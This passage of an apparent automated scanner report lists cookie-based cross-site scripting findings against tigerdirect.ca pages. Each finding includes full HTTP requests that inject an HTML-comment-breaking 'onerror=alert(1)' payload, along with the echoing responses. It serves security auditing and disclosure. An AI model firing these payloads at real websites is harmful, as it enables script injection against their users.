GET /applications/searchtools/item_upsell.asp?EdpNo=1104495&msg= HTTP/1.1
Host: www.tigerdirect.ca
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tigerdirect.ca/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Sidenav=B&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&msProduct=1782290&msRandX=44; SRVR=WEBX13%2D02A; Cart=rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E&rNavEdpDesc=%5ED%3E%3ELogitech+%2D+V220+%2D+Cordless+Optical+Mouse%3E%3EEdpNo%3D3198091%5ED%3E%3ESeagate+2TB+Expansion+External+Drive%3E%3EEdpNo%3D5532176%5ED%3E%3ESabrent+68%2Din%2D1+USB+2%2E0+External+Card+Reader+%26amp%3B+Wri%3E%3EEdpNo%3D1951865&Landing=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Findexca%2Easp&rNavLastVisit=&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17&Referer=; beta=Y; SessionId=4304010201109300823205023123106; CoreID6=06191880977413173855893&ci=90215357; 90215357_clogin=l=1317385589&v=7&e=1317387389326; CoreAt=e5754--><img%20src%3da%20onerror%3dalert(1)>1cee4e52eea; CartId=B9EF64C0%2D02C9%2D4EE6%2D8D81%2DFED18276FD51; SRCCODE=CANW; CartSave=CartId=B9EF64C0%2D02C9%2D4EE6%2D8D81%2DFED18276FD51&Cart=2

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 30 Sep 2011 12:26:22 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-SV: MIA02A
X-Powered-By: ASP.NET
Set-Cookie: Warranty=POPPED; path=/
Set-Cookie: SRCCODE=CANWGOOFS; expires=Sun, 30-Oct-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: Cart=PHRoutine=25&rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E&rNavEdpDesc=%5ED%3E%3ELogitech+%2D+V220+%2D+Cordless+Optical+Mouse%3E%3EEdpNo%3D3198091%5ED%3E%3ESeagate+2TB+Expansion+External+Drive%3E%3EEdpNo%3D5532176%5ED%3E%3ESabrent+68%2Din%2D1+USB+2%2E0+External+Card+Reader+%26amp%3B+Wri%3E%3EEdpNo%3D1951865&Landing=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Findexca%2Easp&TotalItems=1&rNavLastVisit=&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17&Referer=&ProductTotal=79%2E98; path=/
Set-Cookie: DB=msRandX=44603b5%252d%252d%253e%253cScRiPt%253ealert%25281%2529%253c%252fScRiPt%253ed5441123f9b&msProduct=1782290&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&Sidenav=B&msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg; path=/
Set-Cookie: SRVR=WEBX13%2D02A; path=/
Vary: Accept-Encoding
Content-Length: 76001


<!--v1-->
<!--Domain :: tigerdirect.ca-->
<!--imageHost :: http://images.highspeedbackbone.net-->
<!--BaseURL :: www.tigerdirect.ca-->
<!--ContinueShoppingURL :: http://www.tigerdirect.ca/-->
<
...[SNIP]...
<!--CoreAt :e5754--><img src=a onerror=alert(1)>1cee4e52eea-->
...[SNIP]...

3.476. http://www.tigerdirect.ca/applications/searchtools/item_upsell.asp [CoreID6 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tigerdirect.ca
Path:   /applications/searchtools/item_upsell.asp

Issue detail

The value of the CoreID6 cookie is copied into an HTML comment. The payload e1eff--><img%20src%3da%20onerror%3dalert(1)>25de8accf0e was submitted in the CoreID6 cookie. This input was echoed as e1eff--><img src=a onerror=alert(1)>25de8accf0e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /applications/searchtools/item_upsell.asp?EdpNo=1104495&msg= HTTP/1.1
Host: www.tigerdirect.ca
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tigerdirect.ca/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Sidenav=B&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&msProduct=1782290&msRandX=44; SRVR=WEBX13%2D02A; Cart=rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E&rNavEdpDesc=%5ED%3E%3ELogitech+%2D+V220+%2D+Cordless+Optical+Mouse%3E%3EEdpNo%3D3198091%5ED%3E%3ESeagate+2TB+Expansion+External+Drive%3E%3EEdpNo%3D5532176%5ED%3E%3ESabrent+68%2Din%2D1+USB+2%2E0+External+Card+Reader+%26amp%3B+Wri%3E%3EEdpNo%3D1951865&Landing=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Findexca%2Easp&rNavLastVisit=&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17&Referer=; beta=Y; SessionId=4304010201109300823205023123106; CoreID6=06191880977413173855893&ci=90215357e1eff--><img%20src%3da%20onerror%3dalert(1)>25de8accf0e; 90215357_clogin=l=1317385589&v=7&e=1317387389326; CoreAt=90215357=1|0|0|0|0|0|0|0|0|0|0|0|1|1317385589||&; CartId=B9EF64C0%2D02C9%2D4EE6%2D8D81%2DFED18276FD51; SRCCODE=CANW; CartSave=CartId=B9EF64C0%2D02C9%2D4EE6%2D8D81%2DFED18276FD51&Cart=2

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 30 Sep 2011 12:26:06 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-SV: MIA05A
X-Powered-By: ASP.NET
Set-Cookie: Warranty=POPPED; path=/
Set-Cookie: SRCCODE=CANWGOOFS; expires=Sun, 30-Oct-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: Cart=PHRoutine=25&rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E&rNavEdpDesc=%5ED%3E%3ELogitech+%2D+V220+%2D+Cordless+Optical+Mouse%3E%3EEdpNo%3D3198091%5ED%3E%3ESeagate+2TB+Expansion+External+Drive%3E%3EEdpNo%3D5532176%5ED%3E%3ESabrent+68%2Din%2D1+USB+2%2E0+External+Card+Reader+%26amp%3B+Wri%3E%3EEdpNo%3D1951865&Landing=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Findexca%2Easp&TotalItems=1&rNavLastVisit=&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17&Referer=&ProductTotal=79%2E98; path=/
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Surveyflag=1&Sidenav=B&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&msProduct=1782290&msRandX=44a4be4dd28947e8b83bdb940; path=/
Set-Cookie: SRVR=WEBX15%2D05A; path=/
Vary: Accept-Encoding
Content-Length: 75606


<!--v1-->
<!--Domain :: tigerdirect.ca-->
<!--imageHost :: http://images.highspeedbackbone.net-->
<!--BaseURL :: www.tigerdirect.ca-->
<!--ContinueShoppingURL :: http://www.tigerdirect.ca/-->
<
...[SNIP]...
<!--CoreID6(061918809774:90215357e1eff--><img src=a onerror=alert(1)>25de8accf0e-->
...[SNIP]...

3.477. http://www.tigerdirect.ca/applications/searchtools/item_upsell.asp [DB cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tigerdirect.ca
Path:   /applications/searchtools/item_upsell.asp

Issue detail

The value of the DB cookie is copied into an HTML comment. The payload 580a1--><img%20src%3da%20onerror%3dalert(1)>3085a46cf9b was submitted in the DB cookie. This input was echoed as 580a1--><img src=a onerror=alert(1)>3085a46cf9b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /applications/searchtools/item_upsell.asp?EdpNo=1104495&msg= HTTP/1.1
Host: www.tigerdirect.ca
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tigerdirect.ca/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Sidenav=B&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&msProduct=1782290&msRandX=44580a1--><img%20src%3da%20onerror%3dalert(1)>3085a46cf9b; SRVR=WEBX13%2D02A; Cart=rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E&rNavEdpDesc=%5ED%3E%3ELogitech+%2D+V220+%2D+Cordless+Optical+Mouse%3E%3EEdpNo%3D3198091%5ED%3E%3ESeagate+2TB+Expansion+External+Drive%3E%3EEdpNo%3D5532176%5ED%3E%3ESabrent+68%2Din%2D1+USB+2%2E0+External+Card+Reader+%26amp%3B+Wri%3E%3EEdpNo%3D1951865&Landing=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Findexca%2Easp&rNavLastVisit=&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17&Referer=; beta=Y; SessionId=4304010201109300823205023123106; CoreID6=06191880977413173855893&ci=90215357; 90215357_clogin=l=1317385589&v=7&e=1317387389326; CoreAt=90215357=1|0|0|0|0|0|0|0|0|0|0|0|1|1317385589||&; CartId=B9EF64C0%2D02C9%2D4EE6%2D8D81%2DFED18276FD51; SRCCODE=CANW; CartSave=CartId=B9EF64C0%2D02C9%2D4EE6%2D8D81%2DFED18276FD51&Cart=2

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 30 Sep 2011 12:25:43 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-SV: MIA03A
X-Powered-By: ASP.NET
Set-Cookie: Warranty=POPPED; path=/
Set-Cookie: SRCCODE=CANW; expires=Sun, 30-Oct-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: DB=msRandX=44580a1%2D%2D%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E3085a46cf9b&msProduct=1782290&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&Sidenav=B&msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg; path=/
Set-Cookie: SRVR=WEBX14%2D03A; path=/
Vary: Accept-Encoding
Content-Length: 75594


<!--v1-->
<!--Domain :: tigerdirect.ca-->
<!--imageHost :: http://images.highspeedbackbone.net-->
<!--BaseURL :: www.tigerdirect.ca-->
<!--ContinueShoppingURL :: http://www.tigerdirect.ca/-->
<
...[SNIP]...
<!--DB(msRandX) :44580a1--><img src=a onerror=alert(1)>3085a46cf9b-->
...[SNIP]...

3.478. http://www.tigerdirect.ca/applications/searchtools/item_upsell.asp [SessionId cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tigerdirect.ca
Path:   /applications/searchtools/item_upsell.asp

Issue detail

The value of the SessionId cookie is copied into an HTML comment. The payload 90d2c--><img%20src%3da%20onerror%3dalert(1)>9043f721429 was submitted in the SessionId cookie. This input was echoed as 90d2c--><img src=a onerror=alert(1)>9043f721429 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /applications/searchtools/item_upsell.asp?EdpNo=1104495&msg= HTTP/1.1
Host: www.tigerdirect.ca
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tigerdirect.ca/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Sidenav=B&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&msProduct=1782290&msRandX=44; SRVR=WEBX13%2D02A; Cart=rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E&rNavEdpDesc=%5ED%3E%3ELogitech+%2D+V220+%2D+Cordless+Optical+Mouse%3E%3EEdpNo%3D3198091%5ED%3E%3ESeagate+2TB+Expansion+External+Drive%3E%3EEdpNo%3D5532176%5ED%3E%3ESabrent+68%2Din%2D1+USB+2%2E0+External+Card+Reader+%26amp%3B+Wri%3E%3EEdpNo%3D1951865&Landing=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Findexca%2Easp&rNavLastVisit=&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17&Referer=; beta=Y; SessionId=430401020110930082320502312310690d2c--><img%20src%3da%20onerror%3dalert(1)>9043f721429; CoreID6=06191880977413173855893&ci=90215357; 90215357_clogin=l=1317385589&v=7&e=1317387389326; CoreAt=90215357=1|0|0|0|0|0|0|0|0|0|0|0|1|1317385589||&; CartId=B9EF64C0%2D02C9%2D4EE6%2D8D81%2DFED18276FD51; SRCCODE=CANW; CartSave=CartId=B9EF64C0%2D02C9%2D4EE6%2D8D81%2DFED18276FD51&Cart=2

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 30 Sep 2011 12:25:58 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-SV: MIA03A
X-Powered-By: ASP.NET
Set-Cookie: Warranty=POPPED; path=/
Set-Cookie: SRCCODE=CANW; expires=Sun, 30-Oct-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Surveyflag=1&Sidenav=B&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&msProduct=1782290&msRandX=44a4be4dd28947e8b83bdb940; path=/
Set-Cookie: SRVR=WEBX14%2D03A; path=/
Vary: Accept-Encoding
Content-Length: 75559


<!--v1-->
<!--Domain :: tigerdirect.ca-->
<!--imageHost :: http://images.highspeedbackbone.net-->
<!--BaseURL :: www.tigerdirect.ca-->
<!--ContinueShoppingURL :: http://www.tigerdirect.ca/-->
<
...[SNIP]...
<!--SessionId :430401020110930082320502312310690d2c--><img src=a onerror=alert(1)>9043f721429-->
...[SNIP]...

3.479. http://www.tigerdirect.ca/cgi-bin/order.asp [90215357_clogin cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tigerdirect.ca
Path:   /cgi-bin/order.asp

Issue detail

The value of the 90215357_clogin cookie is copied into an HTML comment. The payload 1522b--><img%20src%3da%20onerror%3dalert(1)>db83e617a5d was submitted in the 90215357_clogin cookie. This input was echoed as 1522b--><img src=a onerror=alert(1)>db83e617a5d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /cgi-bin/order.asp?EdpNo=1104495&qty=1&cm_re=Homepage-_-Spot%2003-_-CatId_4441_P229-1128 HTTP/1.1
Host: www.tigerdirect.ca
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tigerdirect.ca/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Sidenav=B&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&msProduct=1782290&msRandX=44; SRVR=WEBX13%2D02A; Cart=rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E&rNavEdpDesc=%5ED%3E%3ELogitech+%2D+V220+%2D+Cordless+Optical+Mouse%3E%3EEdpNo%3D3198091%5ED%3E%3ESeagate+2TB+Expansion+External+Drive%3E%3EEdpNo%3D5532176%5ED%3E%3ESabrent+68%2Din%2D1+USB+2%2E0+External+Card+Reader+%26amp%3B+Wri%3E%3EEdpNo%3D1951865&Landing=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Findexca%2Easp&rNavLastVisit=&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17&Referer=; beta=Y; SessionId=4304010201109300823205023123106; SRCCODE=CANW; CoreID6=06191880977413173855893&ci=90215357; 90215357_clogin=l=1317385589&v=7&e=13173873893261522b--><img%20src%3da%20onerror%3dalert(1)>db83e617a5d; CoreAt=90215357=1|0|0|0|0|0|0|0|0|0|0|0|1|1317385589||&

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 30 Sep 2011 12:27:24 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-SV: MIA01A
X-Powered-By: ASP.NET
Set-Cookie: Warranty=POPPED; path=/
Set-Cookie: SRCCODE=CANWGOOFS; expires=Sun, 30-Oct-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: Cart=PHRoutine=25&Referer=e8400%2D%2D%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E388bbaf6467&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17&rNavLastVisit=&Landing=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Findexca%2Easp&rNavEdpDesc=%5ED%3E%3ELogitech+%2D+V220+%2D+Cordless+Optical+Mouse%3E%3EEdpNo%3D3198091%5ED%3E%3ESeagate+2TB+Expansion+External+Drive%3E%3EEdpNo%3D5532176%5ED%3E%3ESabrent+68%2Din%2D1+USB+2%2E0+External+Card+Reader+%26amp%3B+Wri%3E%3EEdpNo%3D1951865&rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E; path=/
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Surveyflag=1&Sidenav=B&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&msProduct=1782290&msRandX=4472f62%2D%2D%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E423e7fc100a; path=/
Set-Cookie: SRVR=WEBX13%2D01A; path=/
Vary: Accept-Encoding
Content-Length: 76023


<!--v1-->
<!--Domain :: tigerdirect.ca-->
<!--imageHost :: http://images.highspeedbackbone.net-->
<!--BaseURL :: www.tigerdirect.ca-->
<!--ContinueShoppingURL :: http://www.tigerdirect.ca/-->
<
...[SNIP]...
<!--90215357_clogin(e) :13173873893261522b--><img src=a onerror=alert(1)>db83e617a5d-->
...[SNIP]...

3.480. http://www.tigerdirect.ca/cgi-bin/order.asp [Cart cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tigerdirect.ca
Path:   /cgi-bin/order.asp

Issue detail

The value of the Cart cookie is copied into an HTML comment. The payload e8400--><img%20src%3da%20onerror%3dalert(1)>388bbaf6467 was submitted in the Cart cookie. This input was echoed as e8400--><img src=a onerror=alert(1)>388bbaf6467 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /cgi-bin/order.asp?EdpNo=1104495&qty=1&cm_re=Homepage-_-Spot%2003-_-CatId_4441_P229-1128 HTTP/1.1
Host: www.tigerdirect.ca
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tigerdirect.ca/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Sidenav=B&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&msProduct=1782290&msRandX=44; SRVR=WEBX13%2D02A; Cart=rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E&rNavEdpDesc=%5ED%3E%3ELogitech+%2D+V220+%2D+Cordless+Optical+Mouse%3E%3EEdpNo%3D3198091%5ED%3E%3ESeagate+2TB+Expansion+External+Drive%3E%3EEdpNo%3D5532176%5ED%3E%3ESabrent+68%2Din%2D1+USB+2%2E0+External+Card+Reader+%26amp%3B+Wri%3E%3EEdpNo%3D1951865&Landing=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Findexca%2Easp&rNavLastVisit=&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17&Referer=e8400--><img%20src%3da%20onerror%3dalert(1)>388bbaf6467; beta=Y; SessionId=4304010201109300823205023123106; SRCCODE=CANW; CoreID6=06191880977413173855893&ci=90215357; 90215357_clogin=l=1317385589&v=7&e=1317387389326; CoreAt=90215357=1|0|0|0|0|0|0|0|0|0|0|0|1|1317385589||&

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 30 Sep 2011 12:26:39 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-SV: MIA04A
X-Powered-By: ASP.NET
Set-Cookie: Warranty=POPPED; path=/
Set-Cookie: SRCCODE=CANWGOOFS; expires=Sun, 30-Oct-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: Cart=PHRoutine=25&Referer=e8400%2D%2D%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E388bbaf6467&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17&rNavLastVisit=&Landing=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Findexca%2Easp&rNavEdpDesc=%5ED%3E%3ELogitech+%2D+V220+%2D+Cordless+Optical+Mouse%3E%3EEdpNo%3D3198091%5ED%3E%3ESeagate+2TB+Expansion+External+Drive%3E%3EEdpNo%3D5532176%5ED%3E%3ESabrent+68%2Din%2D1+USB+2%2E0+External+Card+Reader+%26amp%3B+Wri%3E%3EEdpNo%3D1951865&rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E; path=/
